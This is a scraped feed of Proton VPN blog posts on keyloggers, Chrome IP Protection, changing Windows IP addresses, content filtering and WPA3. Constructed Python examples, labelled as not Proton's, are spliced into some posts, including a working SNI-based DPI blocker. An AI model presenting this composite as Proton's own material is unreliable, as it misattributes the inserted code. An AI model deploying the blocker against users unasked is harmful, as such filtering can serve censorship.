When compared with other dark webs, Hyphanet will always be a niche alternative to Tor Onion Services. However, it is faster than I2P, and a much greater proportion of its links actually work. 

Of course, what really sets Hyphanet apart from other dark webs is the ability to create closed darknets with like-minded people that are almost impossible to detect. 

Because of their closed nature, it’s impossible to know how many people actually use these darknets or to provide any other kind of objective assessment about them. But that’s rather the point.

What is a keylogger? https://protonvpn.com/blog/keylogger/ Fri, 24 Nov 2023 11:48:09 +0000 https://protonvpn.com/blog/?p=7564

A contraction of “keystroke logger”, a keylogger is either a piece of software or a hardware device that records input from your device’s keyboard. Although not strictly part of the definition, keylogger software can also often record video and/or audio input from your device’s camera and/or microphone and capture data from your clipboard. 

In this article, we look at what keyloggers are, how to detect them, and how to remove them. 

Keylogger definition

A keylogger is any software or hardware device that records your keystrokes when using a computer. Note that “computer” includes mobile devices, as some keylogger software can record your taps and swipes on a touchscreen. 

Software keyloggers are by far the most common, and software keylogging viruses can replicate and infect other devices. 

Hardware keylogging devices might be installed by a manufacturer or government agencies that intercept hardware deliveries. However, the most common type of hardware keylogger is a USB device inserted between a computer’s USB port and its keyboard’s USB connector or dongle (for wireless keyboards). Currently, no known hardware keyloggers can log input from a target mobile device’s touchscreen.  

Most modern keyloggers send the information they collect over the internet to whoever developed or configured them, but some keyloggers (especially physical ones) may require manual retrieval. 

Are keyloggers malware?

Keyloggers are often a form of malware used by criminal hackers to gain illicit access to passwords, bank account details, credit card details, and other highly sensitive information. (Hackers also use hardware keyloggers — a good example is attaching a physical keylogger to the USB ports of computers at an internet café). 

In addition to simple criminal activity, keylogger malware is used for police surveillance, state-sponsored cyber warfare, and corporate espionage. 

However, there are (more) legitimate uses for keyloggers:

  • “Net nanny” software suites often include keylogging capabilities that allow parents to monitor their kids’ online activity and help keep them safe.
  • Companies are increasingly using bossware surveillance software with keylogging capabilities (together with the ability to take screenshots and even webcam photos) to ensure employees don’t slack off. The use of this kind of software has skyrocketed as more and more people work remotely. 

How does a keylogger infect your system?

Malware keyloggers infect systems in the same way that other types of malware do.  

  • Keylogger viruses self-replicate and spread from computer to computer across networks.
  • Keylogger Trojans appear to be legitimate software (or hide inside legitimate software).
  • Rootkits may contain keylogger capabilities and can be difficult to detect, even with good anti-malware software.

Learn more about malware

Attackers often distribute malware keyloggers via drive-by-downloads (scripts executed when you visit a malicious website) or phishing (where you are tricked into installing malicious software or clicking a link to a drive-by-download website). 

Corporate or state-sponsored hackers and the police often perform highly targeted attacks against individuals via personalized spear-phishing tactics that use social engineering to trick the victim into installing a malware keylogger. This type of hacker is also more likely to physically access a device to plant a physical keylogger or infect it with keylogger malware. 

Learn more about phishing and spear phishing

More legitimately, it’s perfectly legal for someone to install a keylogger on hardware they own. This includes devices given to children by their parents and laptops supplied to employees. 

Remote employees who use their own equipment are often required to install bossware keyloggers on their hardware as a condition of their contract. 

How to detect a keylogger

Malware keyloggers are by far the most common type of keylogger, so the most effective general defense against keyloggers is to use good antivirus software. 

If you use a public computer to do anything sensitive (for example, at an internet café), it’s always a good idea to quickly check that no strange devices are plugged into its USB ports. If you think you might be singled out for targeted surveillance, you should periodically give your computer a thorough physical examination. 

Other ways to protect yourself against keyloggers

All the usual precautions for protecting yourself against malware apply to keyloggers:

  • Use good antivirus software
  • Don’t open emails from unknown sources
  • Don’t click links you’re unsure about
  • Don’t install software from untrusted websites

Using two-factor authentication (2FA) is always a good idea, but be aware that malware keyloggers can often steal the contents of your device’s clipboard. Even if you enter the 2FA code manually using your keyboard, a hacker might be able to see this and use the code to log in to your account while the code is still active. 

Additional precautions you can take include:

Use DNS filtering

DNS filtering blocks connections to blocklisted domains. This can help protect you against downloading malware keyloggers from domains that are known to be malicious. If you already have a keylogger on your system, DNS filtering can prevent it from sending your stolen keystrokes back to the hacker. 

Proton VPN offers a DNS filtering feature that’s available to anyone on a paid plan. In addition to filtering out malware, our NetShield Ad-blocker can block ads and trackers. 

Learn more about NetShield

Use a password manager

By far the most common use of keyloggers is to steal usernames and passwords. A password manager such as Proton Pass can autofill passwords, so there are no keystrokes or touchscreen taps for the keylogger to record. 

Final thoughts

Unless you are a person of particular interest to the police, government agencies, corporate hackers, or otherwise have access to valuable assets that could make you a target for cybercriminals, your primary area of concern should be malware keyloggers that opportunistic criminals randomly distribute.

Your best defenses against picking up such malware are using good anti-malware software and being very careful about phishing, which emails you open, and which links you click. 

Google Chrome’s IP Protection is privacy washing https://protonvpn.com/blog/google-ip-protection/ Tue, 21 Nov 2023 17:25:49 +0000 https://protonvpn.com/blog/?p=7554

Last month, Google launched a new feature for Chrome called IP Protection that makes it easier for the company to spy on you. No surprise, since this is Google’s business model. But what’s concerning is that Google is marketing this as a privacy feature.

More and more, Google is using privacy washing, a form of false advertising designed to trick people into thinking their products are private.

Before IP Protection, there was “enhanced ad privacy”, another Chrome feature designed to trap you inside Google’s surveillance network to the exclusion of other companies.

The idea behind IP Protection is much the same. It shields your computer’s IP address from other websites while passing all your web traffic through a server owned by Google. This gives Google a God’s-eye view of every website you visit at all times while using Chrome, whether you are logged in to your Google Account or not. There is zero privacy benefit to IP Protection in its current form, and we strongly recommend people do not enable it.

Other privacy advocates are also raising the alarm. Developers reviewing the codebase have strongly criticized Google.

Criticism of Google Chrome IP Protection

“This doesn’t have anything to do with security,” one developer wrote. “This is all about control, harvesting data, and ensuring Google’s position as the advertising leader on the internet.”

Why is Google doing this?

Google’s competitive advantage is its highly targeted advertising, with 80% of its $224 billion in revenue coming from ads. These ads are only valuable so long as Google knows all about your interests from your searches and browsing activity.

As the world’s most popular web browser, Chrome is Google’s window on billions of people, particularly when combined with other data sources, such as Google Search or Google Maps. If you’re logged into your Google Account, for example to access your Gmail, the company can then associate all your searches with your account. The company has ways to track you even if you’re using Incognito Mode.

This is why IP Protection is a sham. In its initial stage of development, Google Chrome is using its own proxy server to generate a temporary IP address to conceal your real IP address from a list of specific websites that Google owns. To enable IP Protection at this stage, you must opt in.

In future stages, Google says it may add a second proxy server operated by another company. The “second hop”, as they call it, would only see the temporary IP address from the first server and the website you plan to visit. This other company is supposedly independent, but Google would presumably choose the provider and define its policies. 

The two-hop system may look like a privacy benefit — except that Google already has numerous other ways to track you. Google sees your search history, Google Analytics, your Chrome history, cookies in its ad network, mobile location, inbox, calendar, and on and on. What’s the point of a second privacy layer when Google can monitor your activity in so many other ways?

IP Protection is about two things: privacy washing and building a moat.

Google wants to convince you its service is private while simultaneously collecting your intimate data and preventing competitors from doing the same. IP Protection walls off your data from the rest of the internet while sealing Google’s surveillance apparatus on your side of the wall.

What can you do instead of IP Protection?

It’s easy to start building a privacy wall with Google on the outside. 

You can protect your browsing activity and accomplish what IP Protection claims to by simply using a privacy-protecting browser and a VPN. One of Google’s objectives for IP Protection might actually be to stop users from using independent VPN services, particularly since the better VPN services have ad and tracker blocking technologies built in (such as NetShield in Proton VPN).

Use a private browser

Google Chrome is terrible for privacy. But there are alternatives that respect your privacy. While Chrome gathers data about what you do online, browsers like Firefox don’t. If you’re someone who cares about privacy improvements in Google, you should just stop using Google.

Use a real VPN

While Google will monitor your browsing activity through IP Protection, a trustworthy VPN will never do that. A VPN creates an encrypted tunnel between your device and the rest of the internet, hiding your browsing data from your local network while shielding your IP address from the websites you visit.

Proton VPN has a strict no-logs policy which has been independently audited. Google can also be compelled to log user activity under US law. But because Proton is based in Switzerland, you are legally protected from logging orders by Swiss law.

In addition to protecting your IP address, Proton VPN also protects you from ads, trackers, and malware thanks to NetShield ad-blocker, which is something else Google won’t ever do.

Most importantly, Proton’s business model is based on providing privacy-first services to customers who pay for subscriptions. So Proton’s financial incentives are to protect people from online surveillance, while Google is incentivized to do the opposite.

You can learn more about Proton VPN’s privacy features here.

Google doesn’t want you to use a real VPN or switch to truly private services, instead hoping you’ll accept IP Protection, “enhanced ad privacy”, and its other privacy washing features. Don’t take the bait. A better internet is possible if you choose.

Learn more about our mission here.

How to change your IP address on Windows https://protonvpn.com/blog/change-ip-address-windows/ Thu, 16 Nov 2023 16:26:00 +0000 https://protonvpn.com/blog/?p=6518

This article was updated and refreshed November 2023.

We discuss how to change the IP address of your Windows 10 or Windows 11 device. This doesn’t change your IP address on the internet, although we’ll look at that as well. 

Changing your IP address on Windows

An IP address uniquely identifies every device connected directly to a network. Networks can be large or small. Large networks are known as wide area networks (WANs), the most notable example being the internet. 

Local area networks (LANs) are small networks that connect devices within a limited area, such as a home, office, or school. Devices connected to a local area network usually connect to the internet via a router and modem. 

Learn more about IP addresses

In this article, we look both at how to change your Windows device’s external IP address that websites, P2P peers, and apps see and also how to change its local IP address that other devices on your local area network use to identify it. 

  • How to change your external IP address on Windows
  • How to change your local IP address on Windows

How to change your external IP address on Windows

Your external IP address is the IP address you use to connect to the internet. It’s the IP address that anyone on the internet sees, including websites, P2P peers, and the backend servers that your apps connect to. Your external IP address is assigned to you by your internet service provider (ISP).

Most Windows devices connect indirectly to the internet via a WiFi or wired Ethernet connection to a router. The router then connects to a modem (these two are often combined into the same device), which connects to the internet.

In this scenario, your Windows PC’s external IP address that anyone on the internet can see is actually your router’s IP address. All devices that connect to the internet via that router will share the same external IP address (unless you somehow hide your IP address).  

There are several ways to hide your Windows device’s IP address when using the internet, including:

All of these methods route your internet connection to another computer so that you appear to access the internet from that computer’s IP address (in the case of Tor, your connection is routed through a series of “nodes”, so you appear to access the internet from the last “exit node” in the chain). This is known as proxying your connection. 

Of these ways to proxy your connection, the most effective, useful, and convenient method is to use a commercial VPN service such as Proton VPN. We are a 100% free VPN service with no logs, no data restrictions, and no artificial speed limits.

We offer this free service because we believe privacy is a fundamental human right that should be available to everyone. If you want to support our mission and access a range of premium features, such as NetShield Ad-blocker, more than 3,000 servers in more than 65 countries, the ability to stream content from around the world, and more, you can sign up for a premium plan.

How to hide your external IP on Windows using Proton VPN

1. Sign up for a free Proton VPN account.

2. Download the Proton VPN Windows app.

3. Open Windows Explorer, go to your Downloads folder, and double-click the ProtonVPN_win_vxxx.exe installation file you just downloaded.

Download the Proton VPN EXE file

  • If a new window pops up asking Do you want to allow this app to make changes to your device?, click Yes.
  • If installing for the first time, the OpenVPN TAP adapter installation window will appear. Click Next.
  • The Windows .NET framework might also be required. If prompted, follow the instructions to install Windows .NET as well.

4. Select your preferred setup language, click Next, and follow the wizard to install the app onto your Windows system. 

Run the install wizard

5. Open the app and sign in using your Proton Account login details. 

Sign in to the Proton VPN app

6. Click Quick Connect to let the app pick the best server for your location. 

Quick Connect

Alternatively, you can manually choose a country or server to connect to. If you are on our Free plan, you can connect to servers in Japan, the Netherlands, and the United States. If you are on one of our premium plans, you can connect to one of over 1700 servers in over 60 countries. 

Manually select server

Your real IP address is now hidden so that it cannot be seen by websites, P2P peers, or other observers on the internet. 

Learn more about VPNs

To make sure your IP address changed, visit a website such as ip.me with and without the VPN connection. 

Check your external IP address

Change your Windows IP address using a VPN router

Another way to change the external IP address of your Windows PC is to connect it to a VPN router. This is a router configured to route all devices connected to the internet through it (including Windows devices) through a VPN service such as Proton VPN.

Learn how to configure Proton VPN on your router

How to change your local IP address on Windows

Your local IP address is the IP address that your Windows device uses on your local area network (LAN). Your router uses it to send incoming data to the correct device, and other devices on the same local network can see your device’s local IP address. 

A common type of LAN is the home network, where all your household’s laptops, smartphones, tablets, smart devices, games consoles, smart TVs, and other internet-capable devices connect to the internet via a router and modem supplied by your internet service provider (ISP). 

Diagram showing how a LAN network works

Devices connected to a LAN do not connect directly to the internet, so no one on the internet can see their IP addresses. They see your modem’s IP address (unless it’s proxied — see above).

Below, we look at how to change your local IP address on Windows 10 and Windows 11. This changes your devices’ IP address on your LAN but doesn’t affect the IP address seen on the internet because that’s your modem’s IP address. 

Why change your local IP address on Windows?

By default, most routers dynamically assign IP addresses to devices on a local network using the Dynamic Host Configuration Protocol (DHCP).

This means the IP address assigned to your Windows PC may change depending on your network configuration (for example, when you take your Windows laptop out of the house and then return with it).

If other devices on your network access your Windows PC via its IP address, it’s a good idea to configure a static IP for it that your router will not change. For example, this would be useful if you use your Windows device as a media or LAN games server.

Local IPv4 vs IPv6 addresses

Windows 10, Windows 11, and most modern routers can use IPv6. Globally, Internet Protocol version 4 (IPv4) addresses are running out. To solve this problem, the much longer Internet Protocol version 6 (IPv6) address system is being rolled out, which vastly increases the number of addresses available.

However, the local IP addresses issued by your router are for private use only and are not affected by the IPv4 global shortage. So while it is possible to configure your Windows device to use an IPv6 address, there’s little point in doing so. 

Learn more about IPv4 vs. IPv6

How to change your local IP address on Windows 10

1. Go to Start → Settings.

Go to Settings

2. Select Network & Internet 

Select Network & Internet 

3. Select your internet connection (WiFi or Ethernet) and click on Properties.

Go to your connection properties

4. Go to IP settings → IP assignment → Edit.

Edit IP settings

5. Click Automatic (DHCP) and select Manual from the dropdown menu.

Manually edit IP settings

6. Toggle the IPv4 switch on.

Toggle IPv4 on

7. Fill in the IP settings.

  • IP address — This can be any numeric value in the 192.168.0.0 to 192.168.255.255 IP address range.
  • Subnet prefix length — Enter 24 (this corresponds to a subnet mask of 255.255.255.0, which is correct in most cases).
  • Gateway — Enter the IP address of the router or modem your PC is connected to. This is usually either 192.168.0.1 or 192.168.1.1.
  • Preferred DNS — Enter the IP address of a DNS server or DNS service (for example, 9.9.9.9 for Quad9).
Fill in the IP settings

Click Save when you’re done. 

8. You’ve successfully changed your IP address.

Your IP address has now changed

How to change your local IP address on Windows 11

1. Open the Settings app.

Open Settings

2. Go to Network & internet and select your network interface (Ethernet or WiFi).

Select your network interface

3. If you have an Ethernet connection, click on IP assignment → Edit.

Edit IP assignment Ethernet

If you have a WiFi connection, click Hardware properties,

Go to hardware properties

followed by IP assignment → Edit.

Edit IP assignment WiFi

4. Click Automatic (DHCP) and select Manual from the dropdown menu.

Manually edit IP settings

5. Toggle the IPv4 switch on.

Toggle IPv4 on

6. Fill in the IP settings.

  • IP address — This can be any numeric value in the 192.168.0.0 to 192.168.255.255 IP address range.
  • Subnet mask — If you know your subnet mask address, enter it. If not, enter 255.255.255.0.
  • Gateway — Enter the IP address of the router or modem your PC is connected to. This is usually either 192.168.0.1 or 192.168.1.1.
  • Preferred DNS — Enter the IP address of a DNS server or DNS service (for example, 9.9.9.9).
  • Preferred DNS encryption — Choose the level of DNS encryption you prefer (if your DNS server supports it).
Fill in the IP settings

Click Save when you’re done. 

7. You’ve successfully changed your IP address.

Your IP address has now changed

Troubleshooting

If you can no longer connect to the internet after making these changes, there are two possible reasons:

1. Two or more devices on your network have the same IP address

Check the IP addresses of all devices on your network and manually change any that have the same IP address using the instructions above.

2. Incorrect subnet mask

To find your network’s subnet mask, open the Command Prompt app or Windows PowerShell app and enter the following command:

ipconfig

Look for the Subnet Mask entry under your Ethernet or Wireless LAN adapter Wi-Fi connection.

How to find your subnet mask settings

Frequently asked questions

How do I change the IP address of my computer?

To change the external IP address of your laptop or PC that anyone on the internet sees, you’ll need to use an external service such as Tor or Proton VPN. 

Learn more about what a VPN is

Proton VPN offers apps for Windows, macOS, Linux, and Chrome OS (via our Android app). If you’re not sure what operating system (the software that underpins how all your apps can run and work together and allows you to interact with your apps) you’re using, then it’s most likely Windows. 

This guide also shows you how to change the local IP address on Windows 10 and Windows 11 PCs and laptops. This only changes the IP address of your computer on your local network. 

What is my subnet prefix length on Windows 10?

When configuring the IP address on most devices (including Windows 11 devices), you’ll be asked to enter the subnet mask (which in most cases will be 255.255.255.0). On Windows 10, however, you’ll be asked to enter the subnet prefix length instead. A subnet mask of 255.255.255.0 translates into a subnet prefix length of 24 bits, so in most cases, you should enter 24.

If your subnet mask is not 255.255.255.0, you can use a subnet calculator to determine the correct subnet prefix length for your subnet mask.
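As an added example (not code from Proton’s article or apps), the following Python script performs the subnet mask to prefix length conversion described above in both directions, and checks a proposed manual IP configuration for the two troubleshooting problems listed earlier: an address another LAN device already uses, and a gateway that is unreachable because the subnet mask is wrong. The LAN addresses and the settings it tests are constructed sample values.

```python
import ipaddress

# Constructed sample data: addresses that other devices on a home LAN already
# use (what you would gather from "ipconfig" on each device, or from the
# router's client list). These are made-up values, not from any real network.
LAN_ADDRESSES_IN_USE = {
    "192.168.1.1",   # router, which is also the default gateway
    "192.168.1.20",  # smart TV
    "192.168.1.21",  # phone
}

# The range the article recommends for a manually assigned local address.
PRIVATE_192_168 = ipaddress.ip_network("192.168.0.0/16")


def mask_to_prefix_length(mask: str) -> int:
    """Convert the dotted subnet mask Windows 11 asks for into the subnet
    prefix length Windows 10 asks for, e.g. 255.255.255.0 -> 24.

    ipaddress rejects a mask whose ones and zeros are not contiguous
    (such as 255.0.255.0) with a ValueError. It also accepts the inverted
    "hostmask" form (0.0.0.255), which it treats as /24.
    """
    return ipaddress.ip_network(f"0.0.0.0/{mask}").prefixlen


def prefix_length_to_mask(prefix_length: int) -> str:
    """The reverse conversion, e.g. 24 -> 255.255.255.0."""
    return str(ipaddress.ip_network(f"0.0.0.0/{prefix_length}").netmask)


def check_static_ip_settings(ip, mask, gateway, in_use=LAN_ADDRESSES_IN_USE):
    """Check the values you are about to type into Windows' manual IP settings.

    Returns a list of problems; an empty list means the configuration should
    work on the LAN described by ``in_use``.
    """
    problems = []
    try:
        prefix_length = mask_to_prefix_length(mask)
    except ValueError:
        return [f"invalid subnet mask {mask}"]

    try:
        addr = ipaddress.ip_address(ip)
        gw = ipaddress.ip_address(gateway)
    except ValueError as exc:
        return [f"malformed address: {exc}"]

    # strict=False lets us pass a host address rather than a network address.
    subnet = ipaddress.ip_network(f"{addr}/{prefix_length}", strict=False)

    if addr not in PRIVATE_192_168:
        problems.append("IP address is outside 192.168.0.0 to 192.168.255.255")
    if addr in (subnet.network_address, subnet.broadcast_address):
        problems.append("IP address is the subnet's network or broadcast address")
    if gw not in subnet:
        # Troubleshooting reason 2: a wrong subnet mask (or wrong gateway)
        # leaves the router unreachable from the configured address.
        problems.append("gateway is not on the same subnet as the IP address")
    if addr == gw:
        problems.append("IP address is the same as the gateway")
    elif str(addr) in in_use:
        # Troubleshooting reason 1: two devices with the same address.
        problems.append("another device on the LAN already uses this IP address")
    return problems


if __name__ == "__main__":
    print(mask_to_prefix_length("255.255.255.0"))  # 24
    for candidate in ("192.168.1.50", "192.168.1.20", "192.168.2.50"):
        result = check_static_ip_settings(candidate, "255.255.255.0", "192.168.1.1")
        print(candidate, result or "OK")
```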

What is content filtering? https://protonvpn.com/blog/content-filtering/ Tue, 14 Nov 2023 11:16:14 +0000 https://protonvpn.com/blog/?p=7520

Businesses and other organizations use content filtering to block employees or customers from accessing certain online content. 

There are a few reasons they may do this:

  • To improve the security of office networks
  • To prevent customers, students at educational institutions, or anyone who uses a public WiFi hotspot from accessing illegal or undesirable content
  • To improve productivity among staff members by restricting access to social media

In this article, we’ll dig deeper into why organizations use content filtering and how they implement it. 

Why use content filtering?

A business or organization may implement content filtering for a number of reasons. It’s commonly employed to enforce policies related to acceptable use, security, and compliance in various contexts, such as homes, schools, workplaces, and public networks.

Security

Content filtering helps to protect networks and systems from malware, viruses, and other security threats by blocking access to malicious websites and content. It can prevent employees from inadvertently downloading or accessing harmful files, and also protect them from phishing scams.

Acceptable Use

Many (if not most) organizations have acceptable use policies (AUPs) that govern how their network and internet resources can be used. For example, most companies don’t want staff using their office WiFi networks to access NSFW, offensive, discriminatory, or harassing content.

Content filtering can enforce these policies by blocking access to websites and content that violate the AUP.

Public WiFi

Similarly, businesses that offer public WiFi services, such as cafés, airports, and hotels, use content filtering to ensure the security and safety of their customers, while preventing access to illegal or harmful content.

This is also true of universities, schools, and other educational establishments, which often impose stricter restrictions on their networks than commercial businesses do.  

Increased productivity

Organizations sometimes use content filtering to increase workplace productivity by restricting access to non-work-related websites, such as social media, gaming, and streaming platforms. 

The aim is to help ensure that employees stay focused on their tasks, but when everyone can trivially access such services on their smartphones, it’s questionable how effective such tactics are. 

Compliance

Businesses often use content filtering to ensure they adhere to industry regulations, legal requirements, and internal policies. This can include complying with data protection regulations such as HIPAA, GDPR, or CCPA by blocking staff from sharing sensitive information via email or other communication channels.

Content filtering can also be used to help ensure compliance with industry-specific regulations. For example, a financial institution might be subject to regulations such as the Sarbanes-Oxley Act or the Payment Card Industry Data Security Standard (PCI DSS), which require strict controls on data access and storage. Content filtering can help enforce these regulations.

Another aspect of compliance is record keeping and auditing. Content filtering solutions may provide logs and reports that can be used for auditing and compliance verification. These records can be critical for demonstrating that an organization is taking the necessary steps to meet its compliance obligations.

Bandwidth management

Content filtering can be used to manage network bandwidth more efficiently by prioritizing business-critical applications and limiting access to bandwidth-intensive activities such as video streaming.

How does content filtering work?

Content filtering can be implemented in various ways. The exact method used will depend on an organization’s needs (and it may use multiple content filtering techniques).

DNS filtering

The Domain Name System (DNS) maps human-readable domain names to their corresponding IP addresses (for example: protonvpn.com to 185.159.159.140). DNS filtering prevents DNS queries for blacklisted domains from being resolved. 

Learn more about how DNS works

In addition to web content filtering, DNS filtering can help protect organizations from malware and phishing threats by blocking access to known malicious domains. It can prevent users from inadvertently visiting websites that distribute malware or host phishing scams.

DNS filtering can also be used to block access to ad servers or domains known for delivering online advertisements. This helps reduce the number of ads displayed when browsing the web, thus providing a better experience for users.

Proton VPN offers a DNS filtering tool on all platforms called NetShield Ad-blocker that can block ads, malware, and trackers.

Learn more about NetShield Ad-blocker 

URL filtering

URL filtering is similar to DNS filtering, except that it blocks content based on its full web address. This allows more fine-grained control than DNS filtering, as it can be used to block specific pages on a website rather than the entire site. The trade-off is visibility: a DNS resolver sees every queried hostname, but the path of an HTTPS request is encrypted, so a URL filter needs a proxy, browser extension, or endpoint agent that can see the full URL. It's also less useful for blocking other content, such as malware and ads, which is usually done per domain.

Keyword filtering

Filtering content based on specific words or phrases is useful for blocking access to particular types or categories of websites, such as those which host gambling or adult content.

Whitelisting

Some organizations block access to all web content that can be accessed using company resources except for a predetermined list of “whitelisted” websites. This is usually done for security reasons. 
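The four list-based techniques above (DNS, URL, keyword, and whitelisting) are usually combined into one policy pipeline, each stage seeing a different amount of the request. The following is an added example, not code from Proton VPN or any product mentioned on this page. The domains, URL prefixes, keywords, and the stage order (allowlist, then DNS, then URL, then keyword) are constructed for illustration.

```python
from urllib.parse import urlsplit


class ContentFilter:
    """Policy pipeline combining DNS, URL, keyword, and whitelist (allowlist) filtering.
    Each stage returns ("allow", None) or ("block", reason)."""

    def __init__(self, blocked_domains=(), blocked_url_prefixes=(), blocked_keywords=(),
                 allowlist=None):
        self.blocked_domains = {d.lower() for d in blocked_domains}
        self.blocked_url_prefixes = tuple(blocked_url_prefixes)
        self.blocked_keywords = tuple(k.lower() for k in blocked_keywords)
        # allowlist=None means deny-list mode; a collection switches to allowlist-only mode
        self.allowlist = None if allowlist is None else {d.lower() for d in allowlist}

    @staticmethod
    def _host_matches(host, domains):
        # A domain entry covers the domain itself and every subdomain under it
        host = host.lower().rstrip(".")
        return any(host == d or host.endswith("." + d) for d in domains)

    def dns_filter(self, qname):
        """DNS stage: sees only the queried name, so it can only block whole hosts."""
        if self.allowlist is not None and not self._host_matches(qname, self.allowlist):
            return ("block", "allowlist")
        if self._host_matches(qname, self.blocked_domains):
            return ("block", "dns")
        return ("allow", None)

    def url_filter(self, url):
        """URL stage: sees the full address, so it can block a single page or path."""
        if any(url.startswith(prefix) for prefix in self.blocked_url_prefixes):
            return ("block", "url")
        return ("allow", None)

    def keyword_filter(self, text):
        """Keyword stage: needs the page body, which for HTTPS means a proxy or endpoint agent."""
        lowered = text.lower()
        for keyword in self.blocked_keywords:
            if keyword in lowered:
                return ("block", "keyword:" + keyword)
        return ("allow", None)

    def decide(self, url, page_text=""):
        """Run the stages in order and return the first block verdict, else allow."""
        host = urlsplit(url).hostname or ""
        for verdict in (self.dns_filter(host), self.url_filter(url),
                        self.keyword_filter(page_text)):
            if verdict[0] == "block":
                return verdict
        return ("allow", None)


# Constructed policies for this example (hypothetical domains and keywords)
DENYLIST_POLICY = ContentFilter(
    blocked_domains=["ads.example", "malware.example"],
    blocked_url_prefixes=["https://social.example/games/"],
    blocked_keywords=["casino", "adult"],
)
ALLOWLIST_POLICY = ContentFilter(allowlist=["intranet.example"])
```

Running `DENYLIST_POLICY.decide("https://health.example/advice", "Sexual health advice for adults")` blocks on the keyword "adult", which is exactly the kind of false positive that motivates the content analysis approach described below; the allowlist policy, by contrast, blocks everything except `intranet.example` and its subdomains without consulting any other list.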

Content analysis

This is a fairly new type of content filtering that uses machine learning (AI) algorithms, such as natural language processing and image and video recognition, to analyze the content of websites and then implement blocks based on that analysis. 

Content analysis allows for much more nuanced content filtering than the traditional whitelist/blacklist approach. For example, AI content analysis filtering could tell the difference between an adult website and a website that offers sexual health advice.

However, there are numerous privacy and ethical concerns related to AI content analysis. These can be addressed with effective and responsible human oversight, but achieving the right balance between automated content analysis and human judgment remains a challenging issue. 

Other reasons for content filtering

Although the focus of this article is on organizations, such as businesses and educational facilities that use content filtering, it’s worth noting that content filtering is also used in other contexts.

Government censorship

Authoritarian governments around the world block their citizens’ access to content for political, social, or religious reasons. As well as the kinds of content filtering listed above (often applied at the ISP level), governments use their power to impose additional types of content filtering.

Search engine blocks — Governments can pressure search engine providers to remove content they object to from search results.

Deep packet inspection (DPI)  — This is a method of examining the payload of data packets as they pass through a network, not just their headers, so that the protocol, application, or destination can be identified and the traffic blocked, throttled, or logged. Even when the content itself is encrypted, metadata such as the server name sent in the clear at the start of a TLS handshake is often enough to identify where a user is going.
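A concrete instance of DPI-based blocking is matching the Server Name Indication (SNI) in a TLS ClientHello, which is sent unencrypted before the session keys exist. The following is an added example and not code from this page or from any censorship system: it builds a minimal ClientHello (so the example can run offline), parses the SNI back out the way a filter on the path would, and applies a constructed blocklist. The `blocked.example` domain is hypothetical.

```python
import struct

# Constructed blocklist for this example; a real censor would have a far larger one.
BLOCKED_SUFFIXES = ("blocked.example",)


def build_client_hello(server_name):
    """Build a minimal TLS ClientHello record, optionally with an SNI extension.
    Used here only to construct sample packets; a DPI box sees these on the wire."""
    body = b"\x03\x03" + bytes(32) + b"\x00"          # version, 32-byte random, empty session ID
    suites = b"\x13\x01\x13\x02"                       # TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                                # one compression method: null
    extensions = b""
    if server_name is not None:
        name = server_name.encode("idna")
        entry = b"\x00" + struct.pack("!H", len(name)) + name       # name_type 0 = host_name
        name_list = struct.pack("!H", len(entry)) + entry
        extensions += struct.pack("!HH", 0x0000, len(name_list)) + name_list  # ext 0 = SNI
    body += struct.pack("!H", len(extensions)) + extensions
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # handshake type 1 = ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake  # record type 22


def extract_sni(packet):
    """Return the server_name from a TLS ClientHello, or None if the bytes are not a
    ClientHello or carry no SNI. This cleartext field is what the DPI filter keys on."""
    if len(packet) < 5 or packet[0] != 0x16 or packet[1] != 0x03:
        return None
    record_len = struct.unpack("!H", packet[3:5])[0]
    handshake = packet[5:5 + record_len]
    if len(handshake) < 4 or handshake[0] != 0x01:
        return None
    body = handshake[4:4 + int.from_bytes(handshake[1:4], "big")]
    try:
        off = 2 + 32                                             # client_version + random
        off += 1 + body[off]                                     # session_id
        off += 2 + struct.unpack("!H", body[off:off + 2])[0]     # cipher_suites
        off += 1 + body[off]                                     # compression_methods
        if off >= len(body):
            return None                                          # no extensions block at all
        ext_end = off + 2 + struct.unpack("!H", body[off:off + 2])[0]
        off += 2
        while off + 4 <= ext_end:
            ext_type, ext_len = struct.unpack("!HH", body[off:off + 4])
            off += 4
            if ext_type == 0x0000:
                # server_name_list length (2) | name_type (1) | name length (2) | name
                name_len = struct.unpack("!H", body[off + 3:off + 5])[0]
                return body[off + 5:off + 5 + name_len].decode("idna")
            off += ext_len
    except (IndexError, struct.error):
        return None                                              # truncated or malformed: fail open
    return None


def dpi_verdict(packet):
    """Block if the SNI names a blocked domain or any subdomain of one."""
    sni = extract_sni(packet)
    if sni is None:
        return "allow"      # nothing to match on: no SNI, or not a ClientHello at all
    host = sni.lower().rstrip(".")
    if any(host == s or host.endswith("." + s) for s in BLOCKED_SUFFIXES):
        return "block"
    return "allow"
```

The parser fails open on anything it can't read, which is why real deployments pair SNI matching with IP-based blocking: a client that omits SNI, or uses Encrypted Client Hello, gives this stage nothing to match. A VPN defeats it differently, by hiding the ClientHello inside the tunnel so the DPI box only ever sees the connection to the VPN server.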

Parental control

A popular use of content filtering is by parents who wish to moderate what their children can access on the internet. Although traditionally performed by “net nanny” software installed on the child’s device, over recent years there has been a major shift toward software as a service (SaaS) solutions, typically DNS-based, for this purpose. 

Final thoughts

There are many good reasons for organizations to perform content filtering. Moving forward, it’s likely that artificial intelligence will play an increasingly important role in this, so it’s important for companies to develop effective and ethical ways to safeguard the privacy of their staff, customers, or students. 

There is also the risk that authoritarian governments will abuse this power to restrict their citizens’ freedom. However, with Proton VPN for Business, you can evade such restrictions, giving your organization’s staff unhindered access to the free and open internet. 

Learn more about how your business can benefit from using a VPN

The post What is content filtering? appeared first on Proton VPN Blog.

What is WPA3? https://protonvpn.com/blog/wpa3/ Thu, 09 Nov 2023 15:33:27 +0000 https://protonvpn.com/blog/?p=7512 WiFi is the technology that lets you wirelessly connect your computer or mobile device to the internet. As with any connection on a network, there…

The post What is WPA3? appeared first on Proton VPN Blog.

WiFi is the technology that lets you wirelessly connect your computer or mobile device to the internet. As with any connection on a network, there are ways for hackers to intercept the signal to steal data or manipulate the transmission. WPA3 is the latest security standard for keeping your WiFi connections secure. 

It’s a great improvement over its aging predecessor (WPA2), but there remain concerns over WPA3’s security. 

As a “standard”, WPA3 is not a specific piece of software. It’s not even a single algorithm or protocol. Rather, WPA3 is a collection of security methods specified by a certification organization and designated as the global “gold standard” for secure WiFi implementation.

